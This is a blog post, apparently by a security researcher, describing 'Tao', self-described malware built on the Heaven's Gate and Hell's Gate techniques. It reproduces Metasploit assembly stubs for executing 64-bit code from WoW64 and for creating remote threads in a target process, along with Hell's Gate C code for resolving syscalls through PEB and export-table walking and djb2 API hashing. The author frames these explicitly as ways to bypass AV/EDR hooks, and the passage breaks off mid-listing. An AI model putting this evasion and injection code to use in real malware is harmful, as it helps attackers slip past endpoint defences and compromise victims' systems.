Tao: From Heaven to Hell, Alternation of Yin & Yang

Prologue - What is Tao

“One yin and one yang: this is called the Tao.” (《周易》, the I Ching)

In this post, I’ll introduce Tao, a piece of malware that uses the Heaven’s Gate and Hell’s Gate techniques. I’ll explain the principles behind each technique and show how I designed Tao in the Zig programming language.

By the way, this article is not my own research; it draws on plenty of other researchers’ findings, so it reads more like the notes I took while learning from their work. If you have time, please take a look at their research; it’s really worth it. I’ll put the links below.

Let’s get started!

Cover Generated by GPT5

Ascending Through Heaven’s Gate, to Touch the Realm of x64

WoW64 Architecture

Windows 32-bit on Windows 64-bit (WoW64) is a translation layer built into 64-bit Windows that “translates” the system calls made by 32-bit code into 64-bit system calls.

WoW64 Transitioning

This diagram comes from FireEye’s 2020 research. It shows that every WoW64 process has two ntdll modules loaded in memory, one 32-bit and one 64-bit. The functions in the 32-bit ntdll module (on the left) are the last stop for any Win32 API called by a 32-bit application running under WoW64. However, a native 64-bit system cannot execute 32-bit system calls directly. Therefore, the call edx instruction actually invokes the WoW64 translation layer, which translates the 32-bit system call into a 64-bit one and dispatches it to the corresponding function in the 64-bit ntdll module (on the right).

But why can’t a 64-bit system handle a 32-bit system call directly? Because the two sides follow different calling conventions and layouts. For example:

  1. Data Structure Layout:

    The same data structure is laid out differently in memory on 32-bit and 64-bit systems (pointers and handles, for instance, are 4 bytes on one and 8 bytes on the other). WoW64 therefore has to copy the contents of every 32-bit structure passed as a parameter into the equivalent 64-bit structure.

  2. Parameter Passing:

    In the 32-bit calling convention, parameters are pushed onto the stack in order. In the x64 calling convention, the first four parameters go in rcx, rdx, r8, and r9, and the remaining ones go on the stack. WoW64 therefore has to rearrange the 32-bit parameters to follow the x64 calling convention, so that the 64-bit system call finds them where it expects them.

RunSimulatedCode

Every WoW64 process actually hosts a 32-bit program inside a native 64-bit process. This means every WoW64 process initially starts with a 64-bit thread that performs a series of initialization tasks. The thread then transitions into 32-bit mode by calling RunSimulatedCode, a function exported by wow64cpu.dll, before finally jumping to the entry point of the 32-bit program.

RunSimulatedCode

This is the disassembly of RunSimulatedCode generated by Binary Ninja. There are a few important details in the code.

  1. It points the r12 register at the current 64-bit TEB structure, read through gs:0x30.
  2. It points the r15 register at TurboThunkDispatch, an array of pointers in the global variables of wow64cpu.dll.
  3. In the 64-bit TEB, offset +0x1488 from the base holds a pointer to a 32-bit thread context structure. The function loads this pointer into r13, and the structure is used as a snapshot of the 32-bit thread context.

For point 3, since a WoW64 process must frequently switch between 32-bit and 64-bit execution modes during runtime, each thread maintains a dedicated memory space to store its current execution context, such as instruction pointer, register states, and stack information.

The address of this context block is consistently stored at offset +0x1488 in the 64-bit TEB (Thread Environment Block). This detail is crucial and will be leveraged for exploitation later in this article.

TurboThunkDispatch

TurboThunkDispatch

As mentioned, TurboThunkDispatch is an array of pointers; it holds 32 different function pointers. Two functions here are worth our attention.

  1. CpupReturnFromSimulatedCode is the first 64-bit entry point when transitioning back from 32-bit to 64-bit execution. Whenever a 32-bit program invokes a 32-bit system call, it enters this function in wow64cpu.dll. The function saves the current 32-bit thread context, then jumps to TurboDispatchJumpAddressEnd, which in turn invokes the corresponding 64-bit ntdll function to emulate the intended system call.
  2. TurboDispatchJumpAddressEnd, the first function in the array, is responsible for invoking the translator function Wow64SystemServiceEx, exported by wow64.dll, to emulate the system call. Once the emulation is complete, it restores the thread context from the previously saved state and returns to the 32-bit application’s return address, so the application continues seamlessly.

Heaven’s Gate

Heaven’s Gate relies on the CS (code segment) register: loading a different segment selector into CS makes the CPU switch from 32-bit mode to 64-bit mode. The value of CS determines which instruction set the CPU uses to decode instructions.

  • 0x23
    • 32-bit thread mode in WoW64 process
  • 0x33
    • Native 64-bit thread
  • 0x1B
    • Native 32-bit thread

The process performs a far jump to the 0x33 segment to execute the desired 64-bit instructions, then returns to 32-bit mode by jumping back to the 0x23 segment. This technique gives a 32-bit process 64-bit capabilities.
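
To see what these selector values encode, here is a small sketch in portable C. It is not part of Tao, and the type and function names are made up for illustration. It splits a selector into the standard x86 fields: the requested privilege level in bits 0-1, the table indicator in bit 2, and the descriptor table index in the remaining bits.

```c
#include <stdint.h>

/* Fields of an x86 segment selector. */
typedef struct {
    unsigned rpl;    /* bits 0-1: requested privilege level (3 = user mode) */
    unsigned table;  /* bit 2: 0 = GDT, 1 = LDT */
    unsigned index;  /* bits 3-15: index into the descriptor table */
} SelectorFields;

/* Hypothetical helper: decode a raw selector value such as 0x23 or 0x33. */
SelectorFields decode_selector(uint16_t selector)
{
    SelectorFields f;
    f.rpl   = selector & 0x3u;
    f.table = (selector >> 2) & 0x1u;
    f.index = (unsigned)selector >> 3;
    return f;
}
```

Decoding 0x23 gives index 4 and decoding 0x33 gives index 6, both in the GDT with RPL 3, so the two selectors differ only in which descriptor they pick.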

Using Heaven’s Gate in our malware has several advantages, including but not limited to the following.

  1. Run 64-bit code directly from our 32-bit program through WoW64:

    We don’t need a 64-bit executable or process to perform 64-bit operations; Heaven’s Gate lets us do the same from 32-bit code.

  2. Bypass some AV/EDR detections:

    Some AV/EDR products focus on hooking the 32-bit ntdll.dll because our program is 32-bit, so switching to 64-bit mode and using the 64-bit ntdll.dll can bypass those API hooks.

Heaven’s Gate Implementation

execute64.asm

To implement Heaven’s Gate, we can use the code from Metasploit Meterpreter. The following is the execute64.asm stub they provide.

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP
; Architecture: wow64
; Version: 1.0 (Jan 2010)
; Size: 75 bytes
; Build: >build.py executex64
;-----------------------------------------------------------------------------;

; A simple function to execute native x64 code from a wow64 (x86) process.
; Can be called from C using the following prototype:
;     typedef DWORD (WINAPI * EXECUTEX64)( X64FUNCTION pFunction, DWORD dwParameter );
; The native x64 function you specify must be in the following form (as well as being x64 code):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );

; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.

[BITS 32]

WOW64_CODE_SEGMENT EQU 0x23
X64_CODE_SEGMENT EQU 0x33

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64

 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.

 mov ax, ds        ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
 mov ss, ax        ; found and fixed by ReWolf, incorporated by RaMMicHaeL

 add esp, (8+4+8)      ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64
 pop edi         ; restore the clobbered registers
 pop esi         ;
 pop ebp         ; restore EBP
 retn (4*2)        ; return to caller (cleaning up our two function params)

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...

Dissecting execute64.asm

At the start label, the function runs its prologue: it saves the registers it must preserve and loads its two parameters into esi and ecx.

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;

It uses a common shellcode trick to obtain the current instruction pointer. The call delta instruction pushes the address of the next instruction (the return address) onto the stack, and at the delta label, pop eax retrieves that address and stores it in eax. This gives the shellcode its own current memory address, which can be used for further calculations or adjustments.

The following code calculates the address of native_x64 dynamically. (native_x64-delta) is an offset known at assembly time; adding it to the current address obtained by pop eax gives the absolute address of native_x64.

 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64

When it’s ready to execute the native_x64 instructions, Heaven’s Gate is used to switch to 64-bit mode and execute the code. This is done by setting up a far jump, which uses the following code format.

jmp segment:offset
; [edx]     = offset (low 4 bytes)
; [edx+4]   = segment selector (high 2 bytes)

So it is equivalent to

jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

To prepare this far jump, the code reserves 8 bytes on the stack, writes the offset and the segment selector into them, and then executes the far jump instruction. The go_all_native function then enters 64-bit mode and runs the selected 64-bit function with the passed argument, which makes it the entry point of Heaven’s Gate.
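
As a rough illustration of that memory layout, here is a sketch in portable C that fills an 8-byte slot the same way the stub fills [edx] and [edx+4]. The function name is hypothetical, and the code only builds the bytes; it does not perform any jump.

```c
#include <stdint.h>

/* Hypothetical helper: lay out a far pointer the way the stub does.
 * Bytes 0-3 hold the 32-bit offset, bytes 4-5 the selector; the stub
 * stores the selector as a dword, so bytes 6-7 end up zero. */
void build_far_pointer(uint8_t slot[8], uint32_t offset, uint16_t selector)
{
    /* offset, little-endian, at [slot+0] */
    slot[0] = (uint8_t)(offset & 0xFF);
    slot[1] = (uint8_t)((offset >> 8) & 0xFF);
    slot[2] = (uint8_t)((offset >> 16) & 0xFF);
    slot[3] = (uint8_t)((offset >> 24) & 0xFF);
    /* selector, little-endian, at [slot+4], zero-extended to a dword */
    slot[4] = (uint8_t)(selector & 0xFF);
    slot[5] = (uint8_t)((selector >> 8) & 0xFF);
    slot[6] = 0;
    slot[7] = 0;
}
```

For example, an offset of 0x00401000 (an arbitrary address picked for illustration) with selector 0x33 yields the bytes 00 10 40 00 33 00 00 00.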

When the 64-bit code completes, execution returns to the point where go_all_native was called. Before performing the far jump, the code reads the return address from the top of the stack (without popping it) and saves it in edi, which is a way to store the return address manually. This saved return address is later used to jump back from 64-bit mode to 32-bit mode, again with the Heaven’s Gate technique. Let’s look at the implementation in assembly.

X64_CODE_SEGMENT EQU 0x33
 ...
 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.
 ...

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

The native_x64 code is written in 64-bit assembly and executes in 64-bit mode. It calls the specified function pointer with the given parameter. After the function returns, it prepares another far jump to switch back to 32-bit mode. This time it uses 0x23 as the CS value and the WoW64 return address saved earlier in rdi to return to the original 32-bit code through Heaven’s Gate.

WOW64_CODE_SEGMENT EQU 0x23
...
native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...

Through the execute64.asm stub, we gain a clearer understanding of how Heaven’s Gate is implemented and how it enables the execution of native 64-bit code from a WoW64 process.

remotethread.asm

In this section, we will go through the remotethread.asm stub from Metasploit Framework, which creates a remote thread in a target process from 64-bit mode. Before we start, we need to define a structure laid out for the x64 environment rather than x86; this structure will be passed to the 64-bit function.

The structure contains the process handle, the start address of the remote shellcode, the parameter for the shellcode, and a field that receives the thread handle once the remote thread is created. It is named WOW64CONTEXT, and this is what it looks like.

typedef struct _WOW64CONTEXT {
    union {
        HANDLE hProcess;
        BYTE   bPadding2[8];
    } h;  // this is the process handle

    union {
        LPVOID lpStartAddress;
        BYTE   bPadding1[8];
    } s;  // the starting address of remote shellcode

    union {
        LPVOID lpParameter;
        BYTE   bPadding2[8];
    } p;  // parameters for the shellcode

    union {
        HANDLE hThread;
        BYTE   bPadding2[8];
    } t;  // saved thread handle once the thread is created
} WOW64CONTEXT, * PWOW64CONTEXT;

In the structure above, each entry is padded to 8 bytes so that there’s enough room for 64-bit addresses and handles. hThread acts as an output parameter from which we can read the remote thread handle. The assembly stub below first prepares the environment and the parameters, then calls the RtlCreateUserThread function. After the call, the stub checks the returned NTSTATUS to determine whether the remote thread was created, and returns a boolean to indicate success or failure. On success, a new thread has been created in the target process in a suspended state.

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008R2, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 296 bytes
; Build: >build.py remotethread
;-----------------------------------------------------------------------------;

; Function to create a remote thread via ntdll!RtlCreateUserThread, used with the x86 executex64 stub.

; This function is in the form (where the param is a pointer to a WOW64CONTEXT):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );


[BITS 64]
[ORG 0]
    cld                    ; Clear the direction flag.
    mov rsi, rcx           ; RCX is a pointer to our WOW64CONTEXT parameter
    mov rdi, rsp           ; save RSP to RDI so we can restore it later, we do this as we are going to force alignment below...
    and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
    call start             ; Call start, this pushes the address of 'api_call' onto the stack.
delta:                     ;
%include "./src/block/block_api.asm"
start:                     ;
    pop rbp                ; Pop off the address of 'api_call' for calling later.
    ; setup the parameters for RtlCreateUserThread...
    xor r9, r9             ; StackZeroBits = 0
    push r9                ; ClientID = NULL
    lea rax, [rsi+24]      ; RAX is now a pointer to ctx->t.hThread
    push rax               ; ThreadHandle = &ctx->t.hThread
    push qword [rsi+16]    ; StartParameter = ctx->p.lpParameter
    push qword [rsi+8]     ; StartAddress = ctx->s.lpStartAddress
    push r9                ; StackCommit = NULL
    push r9                ; StackReserved = NULL
    mov r8, 1              ; CreateSuspended = TRUE
    xor rdx, rdx           ; SecurityDescriptor = NULL
    mov rcx, [rsi]         ; ProcessHandle = ctx->h.hProcess
    ; perform the call to RtlCreateUserThread...
    mov r10d, 0x40A438C8   ; hash( "ntdll.dll", "RtlCreateUserThread" )
    call rbp               ; RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL )
    test rax, rax          ; check the NTSTATUS return value
    jz success             ; if its zero we have successfully created the thread so we should return TRUE
    mov rax, 0             ; otherwise we should return FALSE
    jmp cleanup            ;
success:
    mov rax, 1             ; return TRUE
cleanup:
    add rsp, (32 + (8*6))  ; fix up stack (32 bytes for the single call to api_call, and 6*8 bytes for the six params we pushed).
    mov rsp, rdi           ; restore the stack
    ret                    ; and return to caller
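
The offsets hardcoded in the stub ([rsi], [rsi+8], [rsi+16], [rsi+24]) follow directly from the 8-byte padding of WOW64CONTEXT. Here is a minimal sketch that checks this with a portable stand-in for the structure as a 32-bit build would see it. The mirror type and the function name are my own, and uint32_t stands in for the 4-byte HANDLE and LPVOID types.

```c
#include <stddef.h>
#include <stdint.h>

/* Portable stand-in for WOW64CONTEXT in a 32-bit build: handles and
 * pointers are 4 bytes wide, and the padding widens each slot to 8. */
typedef struct {
    union { uint32_t hProcess;       uint8_t bPadding[8]; } h;
    union { uint32_t lpStartAddress; uint8_t bPadding[8]; } s;
    union { uint32_t lpParameter;    uint8_t bPadding[8]; } p;
    union { uint32_t hThread;        uint8_t bPadding[8]; } t;
} Wow64ContextMirror;

/* Returns 1 when the layout matches the offsets used by the stub. */
int wow64_context_layout_ok(void)
{
    return offsetof(Wow64ContextMirror, h) == 0    /* mov rcx, [rsi]      */
        && offsetof(Wow64ContextMirror, s) == 8    /* push qword [rsi+8]  */
        && offsetof(Wow64ContextMirror, p) == 16   /* push qword [rsi+16] */
        && offsetof(Wow64ContextMirror, t) == 24   /* lea rax, [rsi+24]   */
        && sizeof(Wow64ContextMirror) == 32;
}
```

Because the 64-bit stub reads each slot as a full qword, the padding bytes should be zeroed before the 32-bit side fills in its 4-byte values.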

You can follow the assembly by reading the comment beside each line. Since it isn’t closely related to Heaven’s Gate, I’ll leave it to you to work through the code on your own.

To make this even easier to understand, the above assembly can be simplified into the following pseudo C code.

BOOL Function64( PWOW64CONTEXT ctx ) {
 if ( !NT_SUCCESS( RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL ) ) ) {
  return FALSE;
 } else {
  return TRUE;
 }
}

By now you should know how Heaven’s Gate works and how to implement it in assembly. Let’s dive into Hell’s Gate.

From Heaven We Descend, into the Depths of Hell

System Calls in Windows

The most common way to invoke a Windows system call is to call a regular Windows API, which usually wraps the system call. For example, when a programmer calls CreateFile, the program actually ends up calling NtCreateFile internally.

All system calls return an NTSTATUS value that represents the result code. For example, STATUS_SUCCESS is returned if the operation was performed successfully.

Most system calls are not documented by Microsoft, so many people have reverse engineered the binaries and recorded them in unofficial documentation. These are a few of them.

Most system calls are exported from ntdll.dll. Using system calls directly offers more options than the standard APIs do, and it can also evade some host-based security solutions.

Zw/Nt System Calls

There are 2 types of system calls in Windows, with prefixes Zw and Nt.

Nt system calls are the main interface for user mode programs; they are the system calls most Windows applications use. Zw system calls, on the other hand, are a lower-level, kernel mode interface, usually used by device drivers and other kernel code that needs direct access to the OS.

Both can be called from user mode and achieve the same functionality. In fact, in ntdll.dll the Nt and Zw functions resolve to the same memory address, which means they share a single implementation. We can use the following C code to verify this.

#include <stdio.h>
#include <windows.h>

typedef NTSTATUS (NTAPI *NtAllocateVirtualMemory_t)(
    HANDLE    ProcessHandle,
    PVOID     *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T   RegionSize,
    ULONG     AllocationType,
    ULONG     Protect
);

int main() {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) {
        printf("Failed to load ntdll.dll\n");
        return 1;
    }

    FARPROC pNt = GetProcAddress(ntdll, "NtAllocateVirtualMemory");
    FARPROC pZw = GetProcAddress(ntdll, "ZwAllocateVirtualMemory");

    if (!pNt || !pZw) {
        printf("Failed to get function addresses.\n");
        return 1;
    }

    printf("NtAllocateVirtualMemory address: %p\n", pNt);
    printf("ZwAllocateVirtualMemory address: %p\n", pZw);

    if (pNt == pZw) {
        printf("[+] They point to the same function!\n");
    } else {
        printf("[-] They are different!\n");
    }

    return 0;
}

// Output:
// NtAllocateVirtualMemory address: 00007ffc24b8d7e0
// ZwAllocateVirtualMemory address: 00007ffc24b8d7e0
// [+] They point to the same function!

System Service Number (SSN)

Each system call has a special number called the system service number (SSN), much like syscall numbers in Linux. It is an identifier used internally by the system to indicate which system service is being requested, such as memory allocation or reading and writing files. It’s meant for the kernel, not for developers. When we perform a system call from user mode, we set the SSN in eax or rax, depending on whether the code is 32-bit or 64-bit, so that the kernel knows which system service we want.

One thing worth noting is that SSNs vary between Windows versions and builds. Unlike syscall numbers on Linux, they are not fixed: different Windows builds rearrange the system services, so we cannot hardcode SSN values in our code.

On a single machine, however, the SSNs are not random; there is a relation between them. When the system call stubs are ordered by memory address, each SSN equals the previous SSN + 1. The following graph shows what this means.

SSN
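
One way to use this relation is to sort the stubs by address and number them in order. Here is a minimal sketch in portable C, assuming the input already contains every system call stub exactly once and that the relation holds on the build in question. The struct, the function names, and the addresses used with it are hypothetical; this is not how Tao or Hell’s Gate resolves SSNs.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

typedef struct {
    const char *name;     /* export name of the stub */
    uint64_t    address;  /* address of the stub in memory */
    uint16_t    ssn;      /* filled in by assign_ssns_by_address */
} StubInfo;

/* qsort comparator: ascending by stub address. */
static int compare_by_address(const void *a, const void *b)
{
    const StubInfo *x = a;
    const StubInfo *y = b;
    return (x->address > y->address) - (x->address < y->address);
}

/* Sort the stubs by address; the position in the sorted array is then
 * taken as the SSN (lowest address gets 0, the next gets 1, and so on). */
void assign_ssns_by_address(StubInfo *stubs, size_t count)
{
    qsort(stubs, count, sizeof *stubs, compare_by_address);
    for (size_t i = 0; i < count; i++)
        stubs[i].ssn = (uint16_t)i;
}
```

The numbering is only as good as the input: a missing stub shifts every SSN after it, which is why the assumption about a complete list matters.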

As the graph shows, all system calls share the same structure. The code snippet below shows the system call pattern.

mov r10, rcx
mov eax, <SSN>
syscall
ret

In the 64-bit Windows calling convention, the first parameter is stored in rcx, but the syscall instruction overwrites rcx with the return address, so the kernel expects the first parameter in r10; mov r10, rcx fulfills that expectation. After this, the SSN is moved into eax, and the syscall instruction triggers the service we need.
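
To connect the four instructions to the bytes we’ll be looking for later, here is a sketch that writes out their machine-code encoding into a buffer. The function name is hypothetical, and the buffer is only meant for comparison against what is found in ntdll; nothing here is executed. It covers only the minimal four-instruction form of the snippet above.

```c
#include <stdint.h>

/* Hypothetical helper: encode the minimal stub pattern into out[11].
 *   4C 8B D1          mov r10, rcx
 *   B8 imm32          mov eax, <SSN>   (immediate is little-endian)
 *   0F 05             syscall
 *   C3                ret
 */
void encode_stub_pattern(uint32_t ssn, uint8_t out[11])
{
    out[0] = 0x4C; out[1] = 0x8B; out[2] = 0xD1;   /* mov r10, rcx */
    out[3] = 0xB8;                                 /* mov eax, imm32 */
    out[4] = (uint8_t)(ssn & 0xFF);                /* lowest byte first */
    out[5] = (uint8_t)((ssn >> 8) & 0xFF);
    out[6] = (uint8_t)((ssn >> 16) & 0xFF);
    out[7] = (uint8_t)((ssn >> 24) & 0xFF);
    out[8] = 0x0F; out[9] = 0x05;                  /* syscall */
    out[10] = 0xC3;                                /* ret */
}
```

Since SSNs are small numbers, bytes 6 and 7 of the pattern are zero in practice, which is a detail the Hell’s Gate scanner relies on.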

On 64-bit systems, the syscall instruction triggers the system call; 32-bit systems use sysenter instead. Executing syscall transfers control from user mode to kernel mode. The kernel then performs the requested action and returns control to user mode once it’s done.

If you look at the instructions in the graph again, you’ll see two more instructions: test and jne. They check a flag in the shared user data page to decide whether to enter the kernel with syscall or to fall back to the int 2e path. In an ordinary 64-bit process the syscall path is taken, so these instructions don’t affect the normal control flow.

Hell’s Gate

Hell’s Gate is a technique for performing direct system calls. The SSN is typically either hardcoded in the program or recovered at runtime by sorting the system call addresses. Hell’s Gate takes a different approach: it reads the SSN out of ntdll dynamically at runtime. There are several ways to locate the functions in ntdll.

  • Using GetModuleHandleA and GetProcAddress
  • PEB (Process Environment Block) walk combined with EAT (Export Address Table) parsing

The first option is the easiest: get the base address of ntdll.dll with GetModuleHandleA, then use GetProcAddress to retrieve the memory address of the native function in ntdll.dll. From an OPSEC perspective, though, it’s not the best approach: if the AV/EDR has hooked either GetModuleHandleA or GetProcAddress, we’re done. Hell’s Gate therefore takes the second approach.

Hell’s Gate Implementation

Here we’re going to look at the original implementation of Hell’s Gate, written in C by @am0nsec & @RtlMateusz.

Hell’s Gate Structures

In the Hell’s Gate source code, there are two structures, _VX_TABLE_ENTRY and _VX_TABLE. Let’s look at the first one.

typedef struct _VX_TABLE_ENTRY {
 PVOID   pAddress;             // The memory address of a syscall function
 DWORD64 dwHash;               // The hash value of the syscall name
 WORD    wSystemCall;          // The SSN of the syscall
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;

_VX_TABLE is built from _VX_TABLE_ENTRY: each member of the table is an entry with those three fields, and each entry describes one system call (native function) used by Hell’s Gate. _VX_TABLE thus holds all the data we need to perform direct system calls, much like a function table. Here is its definition.

typedef struct _VX_TABLE {
 VX_TABLE_ENTRY NtAllocateVirtualMemory;
 VX_TABLE_ENTRY NtProtectVirtualMemory;
 VX_TABLE_ENTRY NtCreateThreadEx;
 VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;

Hell’s Gate Functions

Now that we know the structures of Hell’s Gate, we can dive into its functions.

RtlGetThreadEnvironmentBlock

The TEB (Thread Environment Block) is a per-thread data structure that contains a lot of information about the thread. On Windows, the TEB also holds a pointer to the PEB (Process Environment Block), and the PEB in turn holds information about the loaded DLLs, such as ntdll.dll. Since Hell’s Gate needs the base address of ntdll.dll, we start by getting the TEB.

PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
 return (PTEB)__readgsqword(0x30);
#else
 return (PTEB)__readfsdword(0x18); // TEB self pointer; the original source reads 0x16 here
#endif
}

This function first checks the _WIN64 macro to determine whether the program is being compiled for x64 Windows. If so, it uses the intrinsic __readgsqword to read a qword (64-bit) from offset 0x30 in the GS segment, which holds the TEB pointer on 64-bit Windows. Otherwise (_WIN64 is not defined), the code is being compiled for x86 Windows, and it uses __readfsdword to read a dword (32-bit) from the FS segment, which holds the TEB pointer on 32-bit Windows. The original Hell’s Gate code reads offset 0x16 here, but the TEB self pointer on 32-bit Windows lives at fs:[0x18], so the listing above uses 0x18. Either way, the function returns the pointer to the TEB (PTEB).

GetImageExportDirectory

This function is simple: given the base address of a PE module, it locates and retrieves its export directory (_IMAGE_EXPORT_DIRECTORY). Hell’s Gate later uses this function to get the _IMAGE_EXPORT_DIRECTORY of the ntdll.dll module.

BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
 // Get DOS header
 PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
 if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
  return FALSE;
 }

 // Get NT headers
 PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
 if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
  return FALSE;
 }

 // Get the EAT
 *ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
 return TRUE;
}

First, it gets the DOS header of the PE module and checks whether the e_magic field of the IMAGE_DOS_HEADER structure is IMAGE_DOS_SIGNATURE, which is 0x5A4D, “MZ” in hex. If the value is wrong, it returns FALSE.

Next, it gets the NT headers. e_lfanew is an important member of the DOS header: it is the offset of the NT headers in the file (or memory image). The code first casts pModuleBase to a byte pointer, then adds e_lfanew to get the position of the NT headers. It then validates that the Signature of the NT headers equals IMAGE_NT_SIGNATURE, which is 0x00004550, “PE\0\0” in hex.

Last but not least, it retrieves the export directory and stores its address through ppImageExportDirectory. pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress is the address of the export table; since it’s an RVA (Relative Virtual Address), we add pModuleBase to turn it into a real (absolute) memory address. Finally, the function casts this address to PIMAGE_EXPORT_DIRECTORY, which is a pointer to _IMAGE_EXPORT_DIRECTORY, and returns TRUE.
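
The same three steps can be tried out without windows.h. The following is a sketch in portable C that works on a raw byte buffer instead of the Windows header structures, with bounds checks added. The function and helper names are my own; the numeric offsets (e_lfanew at 0x3C, a 20-byte file header, data directories at offset 96 for PE32 and 112 for PE32+) come from the PE format.

```c
#include <stddef.h>
#include <stdint.h>

/* Little-endian readers for the raw image bytes. */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 and stores DataDirectory[0].VirtualAddress in *rva on success,
 * 0 if the buffer does not look like a PE image. */
int find_export_directory_rva(const uint8_t *image, size_t size, uint32_t *rva)
{
    if (size < 0x40 || rd16(image) != 0x5A4D)       /* "MZ" */
        return 0;

    uint32_t nt = rd32(image + 0x3C);               /* e_lfanew */
    if (nt > size || size - nt < 26)                /* signature + file header + magic */
        return 0;
    if (rd32(image + nt) != 0x00004550)             /* "PE\0\0" */
        return 0;

    const uint8_t *opt = image + nt + 24;           /* 4-byte signature + 20-byte file header */
    size_t dir_off;
    switch (rd16(opt)) {                            /* optional header magic */
    case 0x10B: dir_off = 96;  break;               /* PE32 */
    case 0x20B: dir_off = 112; break;               /* PE32+ */
    default:    return 0;
    }
    if (size - nt - 24 < dir_off + 4)
        return 0;

    *rva = rd32(opt + dir_off);                     /* export directory RVA */
    return 1;
}
```

As in the original function, the value returned is still an RVA; the caller adds the module base to get an absolute address.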

djb2

DWORD64 djb2(PBYTE str) {
 DWORD64 dwHash = 0x7734773477347734;
 INT c;

 while (c = *str++)
  dwHash = ((dwHash << 0x5) + dwHash) + c;

 return dwHash;
}

This function calculates a hash of the given string and is used for the API hashing technique: Hell’s Gate hashes each function name in the EAT and compares the result with a pre-defined hash value to find the function we need. The initial value of dwHash can be changed; it’s just the seed of the djb2 algorithm. I do change it in my own code, since I think this particular value may be easily detected by AV/EDR.
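
To make the role of the seed concrete, here is a portable sketch of the same loop with the seed passed in as a parameter. The function name and the parameter are my own additions; the arithmetic is the same hash * 33 + c step as in the listing above.

```c
#include <stdint.h>

/* djb2 with a caller-supplied seed (hypothetical variant for illustration). */
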